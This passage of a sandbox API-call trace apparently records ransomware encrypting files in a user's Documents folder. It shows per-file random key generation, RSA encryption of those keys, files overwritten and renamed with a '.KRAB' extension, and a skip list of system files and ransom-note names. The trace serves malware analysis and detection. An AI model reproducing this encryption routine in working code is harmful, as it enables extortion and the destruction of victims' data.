dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0089.729] GetLastError () returned 0x0 [0089.729] CryptDestroyKey (hKey=0x10231f8) returned 1 [0089.729] CryptReleaseContext (hProv=0x10112c0, dwFlags=0x0) returned 1 [0089.729] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1010bd8) returned 1 [0089.730] CryptImportKey (in: hProv=0x1010bd8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x10235f8) returned 1 [0089.731] CryptGetKeyParam (in: hKey=0x10235f8, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0089.731] CryptEncrypt (in: hKey=0x10235f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0089.731] GetLastError () returned 0x0 [0089.731] CryptDestroyKey (hKey=0x10235f8) returned 1 [0089.731] CryptReleaseContext (hProv=0x1010bd8, dwFlags=0x0) returned 1 [0089.731] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\6tazTl7G4e-N19_.xls" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\n3lnn9eg\\jlwxnfqt\\6taztl7g4e-n19_.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7ec [0089.732] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0089.732] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0089.732] ReadFile (in: hFile=0x7ec, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e57c*=0x2fd1, lpOverlapped=0x0) returned 1 [0089.747] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0xffffd02f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.747] WriteFile (in: hFile=0x7ec, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x2fd1, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e578*=0x2fd1, lpOverlapped=0x0) returned 1 [0089.747] WriteFile (in: hFile=0x7ec, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338e578*=0x208, lpOverlapped=0x0) returned 1 [0089.747] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.751] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.752] CloseHandle (hObject=0x7ec) returned 1 [0089.752] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.752] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\6tazTl7G4e-N19_.xls" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\n3lnn9eg\\jlwxnfqt\\6taztl7g4e-n19_.xls"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\6tazTl7G4e-N19_.xls.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\n3lnn9eg\\jlwxnfqt\\6taztl7g4e-n19_.xls.krab")) returned 1 [0089.753] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.754] FindNextFileW (in: hFindFile=0x10234f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0089.754] lstrcmpW (lpString1="8aJy5F-_lWUsZiFevN.ods", lpString2=".") returned 1 [0089.754] lstrcmpW (lpString1="8aJy5F-_lWUsZiFevN.ods", lpString2="..") returned 1 [0089.754] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\", lpString2="8aJy5F-_lWUsZiFevN.ods" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\8aJy5F-_lWUsZiFevN.ods") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\8aJy5F-_lWUsZiFevN.ods" [0089.754] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0089.754] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\8aJy5F-_lWUsZiFevN.ods.KRAB") returned 120 [0089.754] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\8aJy5F-_lWUsZiFevN.ods") returned 115 [0089.754] lstrlenW (lpString=".ods") returned 4 [0089.754] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0089.755] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".ods ") returned 5 [0089.755] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.755] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\8aJy5F-_lWUsZiFevN.ods") returned 115 [0089.755] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\8aJy5F-_lWUsZiFevN.ods") returned 115 [0089.755] lstrcmpiW (lpString1="8aJy5F-_lWUsZiFevN.ods", lpString2="desktop.ini") returned -1 [0089.755] lstrcmpiW (lpString1="8aJy5F-_lWUsZiFevN.ods", lpString2="autorun.inf") returned -1 [0089.755] lstrcmpiW (lpString1="8aJy5F-_lWUsZiFevN.ods", lpString2="ntuser.dat") returned -1 [0089.755] lstrcmpiW (lpString1="8aJy5F-_lWUsZiFevN.ods", lpString2="iconcache.db") returned -1 [0089.755] lstrcmpiW (lpString1="8aJy5F-_lWUsZiFevN.ods", lpString2="bootsect.bak") returned -1 [0089.755] lstrcmpiW (lpString1="8aJy5F-_lWUsZiFevN.ods", lpString2="boot.ini") returned -1 [0089.755] lstrcmpiW (lpString1="8aJy5F-_lWUsZiFevN.ods", lpString2="ntuser.dat.log") returned -1 [0089.755] lstrcmpiW (lpString1="8aJy5F-_lWUsZiFevN.ods", lpString2="thumbs.db") returned -1 [0089.755] lstrcmpiW (lpString1="8aJy5F-_lWUsZiFevN.ods", lpString2="KRAB-DECRYPT.html") returned -1 [0089.755] lstrcmpiW (lpString1="8aJy5F-_lWUsZiFevN.ods", lpString2="KRAB-DECRYPT.txt") returned -1 [0089.756] lstrcmpiW (lpString1="8aJy5F-_lWUsZiFevN.ods", lpString2="CRAB-DECRYPT.txt") returned -1 [0089.756] lstrcmpiW (lpString1="8aJy5F-_lWUsZiFevN.ods", lpString2="ntldr") returned -1 [0089.756] lstrcmpiW (lpString1="8aJy5F-_lWUsZiFevN.ods", lpString2="NTDETECT.COM") returned -1 [0089.756] lstrcmpiW (lpString1="8aJy5F-_lWUsZiFevN.ods", lpString2="Bootfont.bin") returned -1 [0089.756] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0089.756] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1010bd8) returned 1 [0089.759] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0089.760] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0089.760] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0089.760] CryptGenRandom (in: hProv=0x1010bd8, dwLen=0x20, pbBuffer=0x338e54c | out: pbBuffer=0x338e54c) returned 1 [0089.760] CryptReleaseContext (hProv=0x1010bd8, dwFlags=0x0) returned 1 [0089.760] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.760] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1010bd8) returned 1 [0089.762] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0089.762] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0089.762] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0089.762] CryptGenRandom (in: hProv=0x1010bd8, dwLen=0x8, pbBuffer=0x338e56c | out: pbBuffer=0x338e56c) returned 1 [0089.762] CryptReleaseContext (hProv=0x1010bd8, dwFlags=0x0) returned 1 [0089.762] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.763] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x10111b0) returned 1 [0089.764] CryptImportKey (in: hProv=0x10111b0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x10235f8) returned 1 [0089.764] CryptGetKeyParam (in: hKey=0x10235f8, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0089.764] CryptEncrypt (in: hKey=0x10235f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0089.765] GetLastError () returned 0x0 [0089.765] CryptDestroyKey (hKey=0x10235f8) returned 1 [0089.765] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0089.765] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x10111b0) returned 1 [0089.766] CryptImportKey (in: hProv=0x10111b0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x10235f8) returned 1 [0089.766] CryptGetKeyParam (in: hKey=0x10235f8, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0089.766] CryptEncrypt (in: hKey=0x10235f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0089.767] GetLastError () returned 0x0 [0089.767] CryptDestroyKey (hKey=0x10235f8) returned 1 [0089.767] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0089.767] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\8aJy5F-_lWUsZiFevN.ods" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\n3lnn9eg\\jlwxnfqt\\8ajy5f-_lwuszifevn.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7ec [0089.767] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0089.768] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0089.768] ReadFile (in: hFile=0x7ec, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e57c*=0x1760d, lpOverlapped=0x0) returned 1 [0089.784] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0xfffe89f3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.784] WriteFile (in: hFile=0x7ec, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x1760d, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e578*=0x1760d, lpOverlapped=0x0) returned 1 [0089.784] WriteFile (in: hFile=0x7ec, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338e578*=0x208, lpOverlapped=0x0) returned 1 [0089.784] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.792] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.793] CloseHandle (hObject=0x7ec) returned 1 [0089.793] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.793] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\8aJy5F-_lWUsZiFevN.ods" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\n3lnn9eg\\jlwxnfqt\\8ajy5f-_lwuszifevn.ods"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\8aJy5F-_lWUsZiFevN.ods.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\n3lnn9eg\\jlwxnfqt\\8ajy5f-_lwuszifevn.ods.krab")) returned 1 [0089.794] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.795] FindNextFileW (in: hFindFile=0x10234f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0089.795] lstrcmpW (lpString1="c36_l.rtf", lpString2=".") returned 1 [0089.795] lstrcmpW (lpString1="c36_l.rtf", lpString2="..") returned 1 [0089.795] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\", lpString2="c36_l.rtf" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\c36_l.rtf") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\c36_l.rtf" [0089.795] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0089.795] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\c36_l.rtf.KRAB") returned 107 [0089.795] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\c36_l.rtf") returned 102 [0089.795] lstrlenW (lpString=".rtf") returned 4 [0089.795] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0089.795] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".rtf ") returned 5 [0089.796] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.796] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\c36_l.rtf") returned 102 [0089.796] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\c36_l.rtf") returned 102 [0089.796] lstrcmpiW (lpString1="c36_l.rtf", lpString2="desktop.ini") returned -1 [0089.796] lstrcmpiW (lpString1="c36_l.rtf", lpString2="autorun.inf") returned 1 [0089.796] lstrcmpiW (lpString1="c36_l.rtf", lpString2="ntuser.dat") returned -1 [0089.796] lstrcmpiW (lpString1="c36_l.rtf", lpString2="iconcache.db") returned -1 [0089.796] lstrcmpiW (lpString1="c36_l.rtf", lpString2="bootsect.bak") returned 1 [0089.796] lstrcmpiW (lpString1="c36_l.rtf", lpString2="boot.ini") returned 1 [0089.796] lstrcmpiW (lpString1="c36_l.rtf", lpString2="ntuser.dat.log") returned -1 [0089.796] lstrcmpiW (lpString1="c36_l.rtf", lpString2="thumbs.db") returned -1 [0089.796] lstrcmpiW (lpString1="c36_l.rtf", lpString2="KRAB-DECRYPT.html") returned -1 [0089.796] lstrcmpiW (lpString1="c36_l.rtf", lpString2="KRAB-DECRYPT.txt") returned -1 [0089.796] lstrcmpiW (lpString1="c36_l.rtf", lpString2="CRAB-DECRYPT.txt") returned -1 [0089.796] lstrcmpiW (lpString1="c36_l.rtf", lpString2="ntldr") returned -1 [0089.796] lstrcmpiW (lpString1="c36_l.rtf", lpString2="NTDETECT.COM") returned -1 [0089.797] lstrcmpiW (lpString1="c36_l.rtf", lpString2="Bootfont.bin") returned 1 [0089.797] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0089.797] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1011898) returned 1 [0089.798] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0089.799] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0089.799] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0089.799] CryptGenRandom (in: hProv=0x1011898, dwLen=0x20, pbBuffer=0x338e54c | out: pbBuffer=0x338e54c) returned 1 [0089.799] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0089.799] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.799] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1010bd8) returned 1 [0089.801] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0089.801] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0089.802] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0089.802] CryptGenRandom (in: hProv=0x1010bd8, dwLen=0x8, pbBuffer=0x338e56c | out: pbBuffer=0x338e56c) returned 1 [0089.802] CryptReleaseContext (hProv=0x1010bd8, dwFlags=0x0) returned 1 [0089.802] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.802] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x10112c0) returned 1 [0089.804] CryptImportKey (in: hProv=0x10112c0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x10235f8) returned 1 [0089.804] CryptGetKeyParam (in: hKey=0x10235f8, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0089.804] CryptEncrypt (in: hKey=0x10235f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0089.804] GetLastError () returned 0x0 [0089.804] CryptDestroyKey (hKey=0x10235f8) returned 1 [0089.804] CryptReleaseContext (hProv=0x10112c0, dwFlags=0x0) returned 1 [0089.804] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1011898) returned 1 [0089.812] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x10235f8) returned 1 [0089.812] CryptGetKeyParam (in: hKey=0x10235f8, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0089.812] CryptEncrypt (in: hKey=0x10235f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0089.812] GetLastError () returned 0x0 [0089.812] CryptDestroyKey (hKey=0x10235f8) returned 1 [0089.812] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0089.813] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\c36_l.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\n3lnn9eg\\jlwxnfqt\\c36_l.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7ec [0089.813] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0089.814] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0089.814] ReadFile (in: hFile=0x7ec, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e57c*=0xa88a, lpOverlapped=0x0) returned 1 [0089.829] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0xffff5776, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.830] WriteFile (in: hFile=0x7ec, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xa88a, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e578*=0xa88a, lpOverlapped=0x0) returned 1 [0089.830] WriteFile (in: hFile=0x7ec, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338e578*=0x208, lpOverlapped=0x0) returned 1 [0089.830] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.889] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.889] CloseHandle (hObject=0x7ec) returned 1 [0089.889] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.890] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\c36_l.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\n3lnn9eg\\jlwxnfqt\\c36_l.rtf"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\c36_l.rtf.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\n3lnn9eg\\jlwxnfqt\\c36_l.rtf.krab")) returned 1 [0089.891] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.891] FindNextFileW (in: hFindFile=0x10234f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0089.891] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0089.891] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0089.891] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\d2ca4a08d2ca4dee3d.lock" [0089.891] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0089.891] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: 